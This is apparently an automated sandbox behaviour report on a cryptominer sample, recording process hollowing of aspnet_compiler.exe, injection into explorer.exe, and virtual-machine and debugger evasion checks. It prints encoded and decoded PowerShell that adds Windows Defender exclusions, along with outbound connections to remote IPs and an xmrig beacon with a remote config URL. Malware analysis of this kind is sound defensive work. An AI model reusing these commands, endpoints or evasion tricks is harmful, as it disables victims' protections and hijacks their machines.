                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4691Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\orupcopicsyv.sysJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6600Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 6580Thread sleep count: 33 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:VMware|VIRTUAL|A M I|Xen
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-CH:Microsoft|VMWare|Virtual
                Source: aspnet_compiler.exeBinary or memory string: OVmCIeEoTlkoRbs8QYAx5QJAFi5bpivwDUAhLUW7K+A0TlIh4ehOgWF2ajlBkzVfni1VmSBWpTVCoTHt8k+baXBqO1qZIOElRVYjQ4c08iBSTC7try2QqTmTLUAGJlCmPVmnIJ29IsCkgn//z78nqD5Hpy+ftytKgS3yrz9IrSHIr4Z85dGtJ6U+Wbg787gkVaMqVZgs7Lo5k6ksVawvWrgi+a4jT6w1Uq4j+7Mwjrw/R6AuW50u8rAtcqc6WJMh+607
                Source: aspnet_compiler.exeBinary or memory string: CbKIMk31SnIGcgexxPFCMbyxeLA+tX52src2tTJwM7ItsqwyYfVmciJyI7HY8R4x2LEcsFK1EnbWt1K1TnBPsk2yzDIB9QZyQnJDsbjxPjH4sTywdrU2duq3brVqcGuyYbLgMiX1InJecp+xXPHaMRSx0LCWtdZ2CreOtYpwi7KBsgAyxfXCcrpyu7Fw8fYxMLH0sKq16nYut6q1pnCnsqWyJDLZ9Z5y2nLbsRDxljFQsZSwyrWKdk63yrXCcMOy+bJ4
                Source: aspnet_compiler.exeBinary or memory string: FgtaUltSYBxbREkpNRceFxsNGkQTDwYRUU0uEFNNXhgAGxEeEQEaDQ5SEgYrFBYKSEcFEQRMUExccwNZK08FHgFSekAASTRRSlMRRlF6BxEXGEBQORJIAgsWEwUVOxsODjYUCwYIV0YaSFp8Ax4GS0szAk5GF1VNDhcFV0s7AkFKTxcGHQsLADUUBBs1FBMMGFd8AgM9WDhaFR4FHTswNCY2FxgdHBofQgg6RjdcExYdIRcXDUoHFyoYAg9ITU1hBQwr
                Source: aspnet_compiler.exeBinary or memory string: Dr9+RwoHCZsxLzjDNKs4ay/reydGq16rfict+zFbOOM0X0eHMycymw5PBYMNCwDrFGtDx39rZotGJxWbOVsw4zxfT4c7JzqbBg8OYwILDasdi0nHdStta00nHNs8uzTjOB9IZzwnP9sDrwuDB0sLCx9rSod2i25LTkceGz2bKYMl31VHIUcg2xyvFEMYaxRrA6tXp2vrc0tTRwLbIrsq4yYfVmciJyHbGa8Rgx1LEQsFa1CHbIt0i1RnBHsnmy+DIx9T
                Source: aspnet_compiler.exeBinary or memory string: kcHx202zczn5mcH3Zec/aYmRtcJ9pjJYkaTw6VHlfSCFwOTO/bLCitGa6tx55CB1ZZFZL+Wnq8KlpsbeqeaG2lHCMhgFsDhyrZqWoPXkrPo1kgp98aW91r2m3scJ5yd5ZcEFL8Wz+7GFmb2KgebajSGRHWtJpwdtgaXh+enlxZjNwKyFebFFD5mbo5Yt5nYgmZCk0A2kQCiNpOz0VeR4Jw3Db0WBsb33TZt3QLXk7LnRke2ZOaV1Hl2mPiRB5Gwz1cO3
                Source: explorer.exe, 00000006.00000002.3378093722.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3378093722.0000000001249000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                Source: aspnet_compiler.exeBinary or memory string: hrey3sL0KQNg+ZC/AHaajBZJMSUbiDBlFOHp4hp66eSaag23JKPL/Dxn7M97Am3ErfH1qN18r9wS/3eLgd82T/U0XERCn6mtt2P+L+5z3HALV1JXf32xcDoc1ow0GKAvtqIlWEQ7bDFtNheXqvbNFQz9srnEWmiYs8ZjYyjRI8EweYrH/H1A0YlRZ2cQ2dnCkfZX3JQeMujt83ron4HlO9zvr9zAZ0rhAb0mFqXfKjJSYby0NwHbL6dVOks9HjR33EU1
                Source: wscript.exe, 00000008.00000002.2300717227.0000023C49AC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: cmd$select * from Win32_BIOS8Unexpected WMI query failure%version&SerialNumber(VMware|VIRTUAL|A M I|Xen)select * from Win32_ComputerSystem*manufacturer+model,Microsoft|VMWare|Virtual-john.anna/xxxxxxxx
                Source: aspnet_compiler.exeBinary or memory string: FNmemReayNlS3N9ZAhqemuzZTtqBmdmbB1qbXbSezl4AX96ZAlxZGUDcjpkCXN6a3F0fGpKZCFsfmRtdjNRfnipYD1kOkdkZThffWTBbz1rA098aiVDZmwOcip2Mlp+eCJDemTebSNlO1Z9ZCpXemsHYjtqJlpmbFI5bXbmfDl4QSx6ZA0sZGUTdDpkFS56ayo9fGpmZSFsNi1tdnEtfnjRbT1kejtkZTAafWQVZT1rOwp8anoAZmzuhit2Yhl+eFAAe
                Source: file.exe, 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorer SbieDll.dll!cuckoomon.dll"win32_process.handle='{0}'#ParentProcessId$cmd%select * from Win32_BIOS8Unexpected WMI query failure&version'SerialNumber)VMware|VIRTUAL|A M I|Xen*select * from Win32_ComputerSystem+manufacturer,model-Microsoft|VMWare|Virtual.john/anna0xxxxxxxxEpowershellVStart-Sleep -Seconds 5; Remove-Item -Path '
                Source: wscript.exe, 00000008.00000002.2300717227.0000023C49AC9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: aspnet_compiler.exeBinary or memory string: Q1kkLPKIzgtjaXCCKt99bCJSgT7hdWTgS2w+V6Iu4SCfMfrl0WR2ayviqa03uZeEalkp/ZC3N6xJckZsoSOwY2FT9KM8uHVpYWC3L5JZYmpsviSSQPVxer4pnmZwVmCiIpV3YlPhsS6TanJoZSHh5FJ7YXZlxzNg+qz2555nHz0v8rqMaTGKlOapCSYz0U5sankp+z+gOvO2hIz5mJntpRJWyzR5ZHasJ01YF3VpaiTnfOu+SHAzwL1tdmQu7aMt7j1V
                Source: WindosCPUsystem.exe, 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                Source: aspnet_compiler.exeBinary or memory string: IfvuVtlqbGox6qMie7Qxcrs6V54u4+FDyXFkeSxV70fBcGpyIVmcIvKkPlmZOo+pJH3gQs5oZWcx+qsxVeJPy2lwajri/kiqeWF2InsmXFEkR+BC1mhlZzFSKF1MPuLPTehqcmkj54IxlqMj+7Ewcqs+VSJCQCzsujhHuSj970epcGpyIVmUIvKkP0mwOvHFSOZkZmYkVr81QqUx7zpPCyD7kz7g7kiqeWF2Inu5NPIoUiwuVYIs7Kk97eVApmtjaTzh
                Source: aspnet_compiler.exeBinary or memory string: 0QHcCaQmqA2gKqWAfJXkVow9/BbAPZR+ycQd5Gap+OXqEMu0iQjTuojhCprisfuInTVjnbnkMYxS5B3kFtfmLOF+HAmkVsGnuPVUwH2sIqQVmH6kUZhm0bjzscm6xvH89bzJAJiXlYUk8+rQ9VydHIuiCc7+JMS2rs3E3aaI287MpRagnp6FpIPRVZR8leRWzLHOKNuAuSF486qovQ6g5uKd+IetyewNoB6sl8p43WJot+yZWReM4TjVipi5DqB52ErY
                Source: aspnet_compiler.exeBinary or memory string: 9oiHo5bTIJKv6qrah8N3w8HtXU4eG1dbT5Gg74AGq8ZzcEbFtfAiMarLMRyprQBtqbSoK+cieqJTRXmi7ymZaVEt+4RIzR/MlgvVEDu/Dz+3KcylNXA08A/ZTMcWELSQTfk0v89KgcsqEmUB46coZ77Wna79+Jb4jLPG1mocmoJcqzFP0dVSfxRfYD9zqKgWa4bCLSKjJHjnnjCervt9U/tIAgUcM7SqsrRfG5/ZWdiaW0J53wrNkU5KY0F61xEsVzBb
                Source: aspnet_compiler.exeBinary or memory string: LAytXJ2trcytS5wL7ItsqwyYfVmciJyI7HY8R4x2LEcsFK1EnbWt1K1TnBPsk2yzDIF9QJyfnJ/sbzxOjH0sTCwdrU2duq3brVqcGuyYbLgMiX1InJecp+xXPHaMRSx0LCWtdZ2DreKtYZwh7KFsgQy+fX+crpyu7Fw8fYxMLH0sKq16nYut6q1pnCnsqWyJDLZ9Z5y2nLbsRTxkjFMsYiwzrWOdkK3xrXCcMOy+bJ4Mr31unL2cvexNPGyMWyxqLDut
                Source: aspnet_compiler.exeBinary or memory string: lCisYR66Kxsa3lhMuH0+PjwV3YgVeLS5e5CcSz0cXhzkJb77sLp41dqPVK1Kn/EtR8teQq3AGcHth8waxekRe/p6flRcihZqiv4hoaVb3IedgKWLO0iTEUBdhOEH2saiWw+kyv5VW0p4TVmciv7Hn9xLf0QYWog6GLKZpeGJHndrKifYjbi3ubq+Fp2K3/EsTitn2zt+uLl5kJxJHbSu6qOYTTh7uPq7VF5IXncvrOWcSj94Ozm6V5nOH7SsCW3gmstQ
                Source: aspnet_compiler.exeBinary or memory string: GxCp2tBNQeJoPVGQa2yNllxpTZDAAVGsvQjtqIg1IbAUdQ3auWTl4CQhUZLUCSmU7UzpkiQBUazAMUmouQyFsChxDdhcVUHi9RT1k5gNKZdccU2R9Tz1rYw9SahMPSGwaVCp2GhZQeMUKVGQqTSNlpx9TZLEPVGub1DtqogJIbDAVQ3bu6zl4GQBUZPwKSmUrUjpk2QhUax8EUmpe1yFsFhRDdkofUHgx0j1kRglKZVsWU2QZ2j1rIwZSanoYSGxyxyp
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeNetwork Connect: 154.216.20.243 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 37.203.243.102 3333Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 192.168.0.100 4444Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\alfons\Desktop\file.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\Desktop\file.exe;Add-MpPreference -ExclusionPath C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\alfons\Desktop\file.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\Desktop\file.exe;Add-MpPreference -ExclusionPath C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exe; Add-MpPreference -ExclusionProcess C:\Users\alfons\AppData\Roaming\WindosCPUsystem.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtQuerySystemInformation: Direct from: 0x7FF8A5701285Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtQueryVolumeInformationFile: Direct from: 0x7FF8A664734CJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtQueryAttributesFile: Direct from: 0x7FF8A845FF57Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF8491050D9Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtQueryAttributesFile: Direct from: 0x7FF8A6644413Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtReadFile: Direct from: 0x7FF8A663C9C8Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x7FF8A84B2EA4Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtSetSecurityObject: Direct from: 0x7FF8C88A26A1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtSetInformationProcess: Direct from: 0x7FF8A845FF6BJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtProtectVirtualMemory: Direct from: 0x7FF8491126F9Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x7FF8490F6CBDJump to behavior
                Source: C:\Users\user\Desktop\file.exeNtCreateThreadEx: Direct from: 0x7FF8A8498EE0Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtClose: Direct from: 0x7FF8A664713F
                Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF8A8498212Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtAllocateVirtualMemory: Direct from: 0x7FF8C88C4B5EJump to behavior
                Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x7FF8A8460906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtClose: Direct from: 0x7FF8A84979FF
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtOpenKeyEx: Direct from: 0x7FF8A84D87B7Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtCreateFile: Direct from: 0x7FF8A664517FJump to behavior
                Source: C:\Users\user\Desktop\file.exeNtDelayExecution: Direct from: 0x7FF8A8405073Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtQueryValueKey: Direct from: 0x7FF8A4C71DC5Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtSetInformationThread: Direct from: 0x7FF8A856C20CJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtSetInformationProcess: Direct from: 0x7FF8A845FF46Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtProtectVirtualMemory: Direct from: 0x7FF8A570B1ACJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtQuerySystemInformation: Direct from: 0x7FF8A84253EEJump to behavior
                Source: C:\Users\user\Desktop\file.exeNtWriteVirtualMemory: Direct from: 0x7FF8491061B2Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtAdjustPrivilegesToken: Direct from: 0x7FF8A5701BECJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtWriteVirtualMemory: Direct from: 0x7FF8491137D2Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtMapViewOfSection: Direct from: 0x7FF8A84FA7F5Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtResumeThread: Direct from: 0x7FF84910704CJump to behavior
                Source: C:\Users\user\Desktop\file.exeNtUnmapViewOfSection: Direct from: 0x7FF849105906Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtQueryAttributesFile: Direct from: 0x7FF8A84DBC4AJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtUnmapViewOfSection: Direct from: 0x7FF849112F26Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtDeviceIoControlFile: Direct from: 0x7FF8A85AF207Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtSetContextThread: Direct from: 0x7FF849106756Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtResumeThread: Direct from: 0x7FF8A8498CF6Jump to behavior
                Source: C:\Users\user\Desktop\file.exeNtQuerySystemInformation: Direct from: 0x7FF8A8498FF3Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtClose: Direct from: 0x7FF8A5B59A3C
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtResumeThread: Direct from: 0x7FF84911466CJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeNtSetContextThread: Direct from: 0x7FF849113D76Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140000000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140000000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 140000000 value: 4DJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 140001000 value: 40Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 140360000 value: 00Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 1404C8000 value: 20Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 1407FB000 value: 00Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 14081B000 value: 48Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 14081C000 value: 48Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 14081F000 value: 48Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 140821000 value: CEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 140822000 value: 00Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 140823000 value: 00Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeMemory written: PID: 6760 base: 1163010 value: 00Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread register set: target process: 1012Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeThread register set: target process: 6760Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeThread register set: target process: 5628Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140000000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140001000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140006000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140008000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C0000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C1000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C2000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C3000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 2F5A42C010Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140000000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140001000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140006000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 140008000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C0000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C1000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C2000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 1406C3000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 94EE632010Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe "C:\Users\user\AppData\Roaming\WindosCPUsystem.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhagwazgbvag4acwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwavwbpag4azabvahmaqwbqafuacwb5ahmadablag0algblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabxagkabgbkag8acwbdafaavqbzahkacwb0aguabqauaguaeablaa==
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhagwazgbvag4acwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwavwbpag4azabvahmaqwbqafuacwb5ahmadablag0algblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabxagkabgbkag8acwbdafaavqbzahkacwb0aguabqauaguaeablaa==Jump to behavior
                Source: explorer.exe, 00000006.00000003.2810758230.00000000012DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2832239989.00000000012D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2811067450.00000000012E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"yfqheswlazlzoxmx","computername":"284992","username":"user","gpu":"P5HMBCCT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":61,"type":"xmrig","status":1}
